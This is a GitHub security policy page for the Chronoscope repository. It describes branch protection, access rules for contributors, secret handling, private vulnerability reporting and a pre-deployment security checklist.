Skip to content

Security: BioInfo/chronoscope

Security

.github/SECURITY.md

Security Policy

πŸ”’ Repository Security

This repository is configured for safe public use with the following security measures:

Branch Protection

The main branch is protected with:

  • Required pull request reviews before merging
  • Only repository maintainers can merge PRs
  • External contributors cannot push directly to branches

Access Control

You (Repository Owner) Control:

  • βœ… Pull request approvals and merges
  • βœ… GitHub Actions workflow execution
  • βœ… Repository secrets and configuration
  • βœ… Branch protection rules
  • βœ… Deployment to production

External Contributors Can:

  • βœ… Fork the repository
  • βœ… Submit pull requests from their forks
  • βœ… View public workflow definitions

External Contributors Cannot:

  • ❌ Push to repository branches
  • ❌ Merge pull requests
  • ❌ Access repository secrets
  • ❌ Modify workflow files without approval
  • ❌ Trigger deployments

GitHub Actions Security

All workflows follow security best practices:

  • Use environment variables for all inputs
  • No command injection vulnerabilities
  • Secrets never exposed to external PRs
  • Limited permissions (read-only by default)
  • Manual workflows require write access

API Keys and Secrets

  • Gemini API keys are stored in localStorage (client-side only)
  • Vercel tokens are stored as GitHub Secrets (encrypted)
  • No secrets are committed to the repository
  • .env files are gitignored

πŸ› Reporting Security Vulnerabilities

If you discover a security vulnerability, please DO NOT open a public issue.

Instead:

  1. Email the maintainer directly with details
  2. Or use GitHub's Private Vulnerability Reporting

Include:

  • Description of the vulnerability
  • Steps to reproduce
  • Potential impact
  • Suggested fix (if any)

We will respond within 48 hours and work with you to resolve the issue.

πŸ” Security Best Practices for Contributors

When Contributing Code

  • βœ… Never commit API keys, tokens, or secrets
  • βœ… Use environment variables for configuration
  • βœ… Validate all user inputs
  • βœ… Follow secure coding practices
  • βœ… Test for XSS and injection vulnerabilities

When Submitting PRs

  • βœ… Review your changes for sensitive data
  • βœ… Ensure .env files are not included
  • βœ… Check for accidentally committed credentials
  • βœ… Run git log to verify commit history

When Using GitHub Actions

  • βœ… Use environment variables for all inputs
  • βœ… Never interpolate untrusted data in run commands
  • βœ… Follow the GitHub Actions security guide

πŸ›‘οΈ Dependency Security

We monitor dependencies for security vulnerabilities:

  • Dependabot alerts enabled
  • Regular dependency updates
  • Security advisories reviewed

To update dependencies:

npm audit
npm audit fix

πŸ“‹ Security Checklist

Before deploying changes:

  • No secrets in code or commits
  • .env files properly gitignored
  • All dependencies updated and audited
  • User inputs validated and sanitized
  • XSS protection in place
  • HTTPS used for all external APIs
  • GitHub Actions workflows secured

πŸ”„ Security Updates

This security policy is reviewed and updated regularly. Last updated: 2025-11-28

πŸ“ž Contact

For security concerns, contact the repository maintainer via GitHub.

βš–οΈ Responsible Disclosure

We appreciate security researchers who responsibly disclose vulnerabilities. We commit to:

  • Acknowledging your report within 48 hours
  • Providing a timeline for fixes
  • Crediting you in release notes (if desired)
  • Keeping you informed throughout the process

Thank you for helping keep The Chronoscope secure! πŸ”’

There aren’t any published security advisories